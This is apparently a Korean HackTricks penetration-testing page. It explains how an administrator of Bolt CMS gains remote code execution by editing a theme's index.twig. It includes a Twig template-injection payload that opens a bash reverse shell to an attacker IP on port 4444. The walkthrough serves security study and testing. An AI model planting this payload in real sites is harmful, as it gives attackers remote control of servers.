Bolt CMS

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

RCE

๊ด€๋ฆฌ์ž๋กœ ๋กœ๊ทธ์ธํ•œ ํ›„ (/bot๋กœ ์ด๋™ํ•˜์—ฌ ๋กœ๊ทธ์ธ ํ”„๋กฌํ”„ํŠธ์— ์ ‘๊ทผ), Bolt CMS์—์„œ RCE๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

  • Configuration -> View Configuration -> Main Configuration์„ ์„ ํƒํ•˜๊ฑฐ๋‚˜ URL ๊ฒฝ๋กœ /bolt/file-edit/config?file=/bolt/config.yaml๋กœ ์ด๋™ํ•ฉ๋‹ˆ๋‹ค.
  • ํ…Œ๋งˆ์˜ ๊ฐ’์„ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค.
  • File management -> View & edit templates๋ฅผ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค.
  • ์ด์ „ ๋‹จ๊ณ„์—์„œ ์ฐพ์€ ํ…Œ๋งˆ ๊ธฐ๋ณธ๊ฐ’(base-2021์ธ ๊ฒฝ์šฐ)์„ ์„ ํƒํ•˜๊ณ  index.twig๋ฅผ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค.
  • ์ œ ๊ฒฝ์šฐ์—๋Š” URL ๊ฒฝ๋กœ /bolt/file-edit/themes?file=/base-2021/index.twig์— ์žˆ์Šต๋‹ˆ๋‹ค.
  • template injection (Twig)๋ฅผ ํ†ตํ•ด ์ด ํŒŒ์ผ์— ํŽ˜์ด๋กœ๋“œ๋ฅผ ์„ค์ •ํ•ฉ๋‹ˆ๋‹ค, ์˜ˆ: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
  • ๋ณ€๊ฒฝ ์‚ฌํ•ญ์„ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค.
  • Maintenance -> Clear the cache์—์„œ ์บ์‹œ๋ฅผ ์ง€์›๋‹ˆ๋‹ค.
  • ์ผ๋ฐ˜ ์‚ฌ์šฉ์ž๋กœ ๋‹ค์‹œ ํŽ˜์ด์ง€์— ์ ‘๊ทผํ•˜๋ฉด ํŽ˜์ด๋กœ๋“œ๊ฐ€ ์‹คํ–‰๋˜์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ